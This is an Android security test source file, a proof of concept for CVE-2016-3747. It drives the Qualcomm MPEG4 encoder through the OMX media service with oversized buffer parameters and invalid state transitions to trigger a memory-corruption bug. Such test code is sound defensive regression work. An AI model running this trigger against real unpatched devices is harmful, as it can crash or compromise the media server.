/**
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define LOG_TAG "CVE-2016-3747"

#include <list>
#include <memory>

#include <OMX_Component.h>
#include <binder/MemoryDealer.h>
#include <log/log.h>
#include <media/IOMX.h>
#include <media/OMXBuffer.h>
#include <media/stagefright/OMXClient.h>
#include <utils/StrongPointer.h>

using namespace android;

struct DummyOMXObserver : public BnOMXObserver {
 public:
  DummyOMXObserver() {}

  virtual void onMessages(const std::list<omx_message> &messages __unused) {}

 protected:
  virtual ~DummyOMXObserver() {}
};

bool fuzzIOMXQcomEnc() {
  sp<IOMXNode> node;
  sp<IOMX> mOmx;
  int fenceFd = -1;
  const char *name = "OMX.qcom.video.encoder.mpeg4";

  std::unique_ptr<OMX_PARAM_PORTDEFINITIONTYPE> params(new OMX_PARAM_PORTDEFINITIONTYPE);
  params->nPortIndex = 0;  // input port
  params->format.video.nFrameHeight = 1280 * 4;
  params->format.video.nFrameWidth = 720 * 4;
  params->nBufferCountActual = 12;
  params->nBufferSize = 73728;
  params->nBufferCountMin = 0x4;

  int inMemSize = params->nBufferSize * 12;
  int outMemSize = 49152 * 4;
  int inBufferCnt = 12;
  int outBufferCnt = 4;
  int inBufferSize = inMemSize / inBufferCnt;
  int outBufferSize = outMemSize / outBufferCnt;

  sp<IMemory> memory;

  OMXClient client;
  if (client.connect() != OK) {
    ALOGE("OMXClient connect == NULL");
    return false;
  }

  mOmx = client.interface();
  if (mOmx == NULL) {
    ALOGE("OMXClient interface mOmx == NULL");
    client.disconnect();
    return false;
  }

  sp<DummyOMXObserver> observer = new DummyOMXObserver();
  status_t err = mOmx->allocateNode(name, observer, &node);
  if (err != OK) {
    ALOGI("%s node allocation fails", name);
    return false;
  }
  // make venc in invalid state
  err = node->sendCommand(OMX_CommandStateSet, 2);
  if (err != OK) {
    ALOGE("sendCommand is failed in OMX_StateIdle, err: %d", err);
    node->freeNode();
    return false;
  }

  sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
  std::unique_ptr<IOMX::buffer_id[]> inBufferId(new IOMX::buffer_id[inBufferCnt]);
  for (int i = 0; i < inBufferCnt; i++) {
    sp<IMemory> memory = dealerIn->allocate(inBufferSize);
    if (memory.get() == nullptr) {
      ALOGE("memory allocate failed for port index 0, err: %d", err);
      node->freeNode();
      return false;
    }
    OMXBuffer omxInBuf(memory);
    err = node->useBuffer(0, omxInBuf, &inBufferId[i]);
    ALOGI("useBuffer, port index 0, err: %d", err);
  }

  sp<MemoryDealer> dealerOut = new MemoryDealer(outMemSize);
  std::unique_ptr<IOMX::buffer_id[]> outBufferId(new IOMX::buffer_id[outBufferCnt]);
  for (int i = 0; i < outBufferCnt; i++) {
    sp<IMemory> memory = dealerOut->allocate(outBufferSize);
    if (memory.get() == nullptr) {
      ALOGE("memory allocate failed for port index 1, err: %d", err);
      node->freeNode();
      return false;
    }
    OMXBuffer omxOutBuf(memory);
    err = node->useBuffer(1, omxOutBuf, &outBufferId[i]);
    ALOGI("useBuffer, port index 1, err: %d", err);
  }

  // make venc in invalid state
  err = node->sendCommand(OMX_CommandStateSet, 3);
  ALOGI("sendCommand, err: %d", err);
  if (err != OK) {
    ALOGE("sendCommand is failed in OMX_StateExecuting, err: %d", err);
    node->freeNode();
    return false;
  }

  OMXBuffer omxInBuf(memory);
  for (int i = 0; i < inBufferCnt; i++) {
    err = node->emptyBuffer(inBufferId[i], omxInBuf, 0, 0, fenceFd);
    ALOGI("emptyBuffer, err: %d", err);
  }

  OMXBuffer omxOutBuf(memory);
  for (int i = 0; i < outBufferCnt; i++) {
    err = node->fillBuffer(outBufferId[i], omxOutBuf, fenceFd);
    ALOGI("fillBuffer, err: %d", err);
  }
  err = node->freeNode();
  ALOGI("freeNode, err: %d", err);
  return true;
}

/**
 * Entry point: runs the PoC once.
 *
 * The bool result is converted to the exit status, so the process exits with
 * 1 when fuzzIOMXQcomEnc() returns true and 0 when it returns false.
 */
int main() {
  const bool completed = fuzzIOMXQcomEnc();
  return completed ? 1 : 0;
}
